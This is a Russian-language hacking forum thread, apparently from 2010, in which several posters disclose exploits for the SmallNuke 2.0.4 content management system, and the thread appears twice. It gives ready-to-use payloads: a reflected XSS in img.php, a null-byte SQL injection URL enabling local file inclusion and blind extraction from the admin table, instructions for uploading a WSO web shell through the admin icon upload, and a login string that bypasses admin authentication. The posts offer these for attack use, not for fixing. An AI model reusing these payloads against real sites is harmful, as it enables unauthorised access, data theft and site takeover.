Уязвимости SmallNuke

t3zo · 07.07.2010, 12:14

SmallNuke 2.0.4

уязвимый
сценарий img.php
Параметр img_url
47 строка

Код:

<center><a href="javascript:window.close()"><img alt="Click to close this window!" name="LargeImg" src="<?php echo $_GET['img_url']?>" border="0"/></a></center>

sploit
xak/smallnuke/img.php?img_url=[XSS]

(c) t3zo

Grey · 07.07.2010, 14:18

SmallNuke <= 2.0.4 (Локальный инклуд файлов / Слепая SQL инъекция)

Уязвимость в файле: inc/modules.php

Код:

$sql = "SELECT * FROM ".SN_TABLE_MODULES." WHERE title='$go'";

Данные из запроса подставляются в include()
Фильтрация не достаточная - используется уязвимая функция ereg().

Код:

http://site.com/index.php?go=1%00'+and+1=2+union+select+1,'../robots.txt%00',3,4,5,6,7,8,9,10,11,12--+1

Ну и разумеется инъекцию можно использовать просто как слепую:

Код:

http://site.com/index.php?go=1%00'+and+1=2+union+select+1,'../robots.txt%00',3,4,5,6,7,8,9,10,11,12+from+sn_admins+where+login='grey'--+1

Соответственно если файл инклудится, то запрос выполнен верно, если не подключается - не верно.

2008 © Grey

Pashkela · 07.07.2010, 16:07

SmallNuke v. 2.0.4 Full (самая скачиваемая) льем шелл из админки:

В админке идем в

Блоки->Выбираем например "Кто на сайте"->Править->Иконка

и льем шелл, файло льется, но в админке не отображается, можно посмотреть на главной странице адрес шелла:

будет примерно такой:

Код:

http://localhost/snuke/www/images/block/1278503889_wso2.php

копируем шелл, удаляем иконку (или возвращаем на место старую)

BlackFan · 09.07.2010, 13:00

SmallNuke v. 2.0.4 (Возможно и другие версии)
http://smallnuke.com/index.php?go=Files&in=cat&id=1
"Powered by Smallnuke"

Blind SQL-Inj / Обход авторизации

Уязвимый скрипт: /admin/admin.php

PHP код:


			
if (isset ($_POST['enter_admin'])) {

   $admin_name = isset ($_POST['admin_name']) ? substr (str_replace ("\\'", "''", str_replace ("'", "\'", rtrim (htmlspecialchars (str_replace ("\'", "'", trim (strip_tags ($_POST['admin_name'])))), "\\"))), 0, 15) : '';

   $code_password = isset ($_POST['admin_password']) ? md5 (trim ($_POST['admin_password'])) : '';

   if ('' == $admin_name || '' == $code_password || md5('') == $code_password) { header ('Location: admin.php'); exit; }

   $sql = "SELECT admin_id, login, password FROM ".SN_TABLE_ADMINS." WHERE login='$admin_name' AND password='$code_password'";

   $result = $db->sql_query ($sql);

   $row = $db->sql_fetchrow ($result);

   if ($row) {

Сплоит:

Код:

login: 1\\'or(1)#
pass: любой

Ctacok · 13.08.2010, 07:46

Цитата:

Сообщение от Pashkela

SmallNuke v. 2.0.4 Full (самая скачиваемая) льем шелл из админки:

А ты сам пробывал зайти по ссылке? Сразу 403 рубит. Извеняюсь за оффтоп.

07.07.2010, 12:14	#1
t3zo Регистрация: 07.07.2010 Сообщений: 1 Репутация: 0	Уязвимости SmallNuke SmallNuke 2.0.4 уязвимый сценарий img.php Параметр img_url 47 строка Код: <center><a href="javascript:window.close()"><img alt="Click to close this window!" name="LargeImg" src="<?php echo $_GET['img_url']?>" border="0"/></a></center> sploit xak/smallnuke/img.php?img_url=[XSS] (c) t3zo Последний раз редактировалось Jokester; 07.07.2010 в 14:25..

07.07.2010, 14:18	#2
Grey Регистрация: 30.06.2010 Сообщений: 38	SmallNuke <= 2.0.4 (Локальный инклуд файлов / Слепая SQL инъекция) Уязвимость в файле: inc/modules.php Код: $sql = "SELECT * FROM ".SN_TABLE_MODULES." WHERE title='$go'"; Данные из запроса подставляются в include() Фильтрация не достаточная - используется уязвимая функция ereg(). Код: http://site.com/index.php?go=1%00'+and+1=2+union+select+1,'../robots.txt%00',3,4,5,6,7,8,9,10,11,12--+1 Ну и разумеется инъекцию можно использовать просто как слепую: Код: http://site.com/index.php?go=1%00'+and+1=2+union+select+1,'../robots.txt%00',3,4,5,6,7,8,9,10,11,12+from+sn_admins+where+login='grey'--+1 Соответственно если файл инклудится, то запрос выполнен верно, если не подключается - не верно. 2008 © Grey Последний раз редактировалось Grey; 07.07.2010 в 14:21..

07.07.2010, 16:07	#3
Pashkela Регистрация: 05.07.2010 Сообщений: 1,243	SmallNuke v. 2.0.4 Full (самая скачиваемая) льем шелл из админки: В админке идем в Блоки->Выбираем например "Кто на сайте"->Править->Иконка и льем шелл, файло льется, но в админке не отображается, можно посмотреть на главной странице адрес шелла: будет примерно такой: Код: http://localhost/snuke/www/images/block/1278503889_wso2.php копируем шелл, удаляем иконку (или возвращаем на место старую)

09.07.2010, 13:00	#4
BlackFan Регистрация: 08.07.2010 Сообщений: 354 Репутация: 402	SmallNuke v. 2.0.4 (Возможно и другие версии) http://smallnuke.com/index.php?go=Files&in=cat&id=1 "Powered by Smallnuke" Blind SQL-Inj / Обход авторизации Уязвимый скрипт: /admin/admin.php PHP код: if (isset ($_POST['enter_admin'])) { $admin_name = isset ($_POST['admin_name']) ? substr (str_replace ("\\'", "''", str_replace ("'", "\'", rtrim (htmlspecialchars (str_replace ("\'", "'", trim (strip_tags ($_POST['admin_name'])))), "\\"))), 0, 15) : ''; $code_password = isset ($_POST['admin_password']) ? md5 (trim ($_POST['admin_password'])) : ''; if ('' == $admin_name \|\| '' == $code_password \|\| md5('') == $code_password) { header ('Location: admin.php'); exit; } $sql = "SELECT admin_id, login, password FROM ".SN_TABLE_ADMINS." WHERE login='$admin_name' AND password='$code_password'"; $result = $db->sql_query ($sql); $row = $db->sql_fetchrow ($result); if ($row) { Сплоит: Код: login: 1\\'or(1)# pass: любой

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид